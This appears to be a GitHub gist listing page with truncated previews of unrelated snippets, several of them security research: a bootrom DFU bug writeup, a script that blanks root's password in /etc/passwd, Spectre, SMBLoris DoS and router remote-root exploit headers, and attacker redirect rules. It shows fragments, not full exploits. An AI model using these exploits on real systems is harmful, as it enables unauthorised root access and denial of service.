This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This bug was also called moonshine in the beginning | |
Basically the following bug is present in all bootroms I have looked at: | |
1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output | |
2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code | |
3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer | |
4. it then returns wLength which is the length it wants to recieve into the buffer | |
5. the usb main code then updates a global var with the length and gets ready to recieve the data packages | |
6. if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were recieved already | |
7. if all the data was recieved th |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import sys | |
import os | |
import signal | |
PATTERN = b"root:x:0:0:root" | |
REPLACE = b"root::00:0:root" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import hmac, hashlib | |
# Data from I²C trace at https://hackaday.io/project/19480-raspberry-pi-camera-v21-reversed/log/52547-i2c-logic-analyzer-trace | |
# Secret key from VideoCore blob | |
# serial[8], serial[7:4], serial[3:0] | |
serial = bytes.fromhex("EE8C196D8301230B59") | |
# rPi -> camera random number | |
numIn = bytes.fromhex("5805F3C898C3133154498E082F2E703516F2DBD1") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Algorithm to process Wiimote IR tracking data into a usable pointer position | |
* by tracking the sensor bar. | |
* | |
* Copyright (c) 2008-2011 Hector Martin "marcan" <marcan@marcan.st> | |
* All rights reserved. | |
* | |
* Redistribution and use in source and binary forms, with or without | |
* modification, are permitted provided that the following conditions are met: | |
* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script type="text/javascript"> | |
if (document.images) { | |
img1 = new Image(); | |
img1.src = "https://gist.github.com/Zibri/c040a013548f3f5039fa75cafb98d9a8/raw/374b3ba2ca881eb0a39958dd724765eefd0703fe/gatto1.jpg"; | |
img2 = new Image(); | |
img2.src = "https://gist.github.com/Zibri/c040a013548f3f5039fa75cafb98d9a8/raw/374b3ba2ca881eb0a39958dd724765eefd0703fe/gatto2.jpg"; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git clone https://github.com/speed47/spectre-meltdown-checker.git | |
cd spectre-meltdown-checker/ | |
sudo sh spectre-meltdown-checker.sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
# Save this file into something like /etc/apache2/redirect.rules. | |
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
# | |
# Include /etc/apache2/redirect.rules | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* SMBLoris attack proof-of-concept | |
* | |
* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st> | |
* | |
* Licensed under the terms of the 2-clause BSD license. | |
* | |
* This is a proof of concept of a publicly disclosed vulnerability. | |
* Please do not go around randomly DoSing people with it. | |
* | |
* Tips: do not use your local IP as source, or if you do, use iptables to block |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* PK5001Z CenturyLink Router/Modem remote root exploit */ | |
/* oxagast / Marshall Whittaker */ | |
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */ | |
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */ | |
/* PK5001Z CenturyLink Router remote root 0day */ | |
/* Enjoy! */ | |
/* --oxagast */ | |
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */ | |
/* */ | |
/* # uname -a; id; */ |
NewerOlder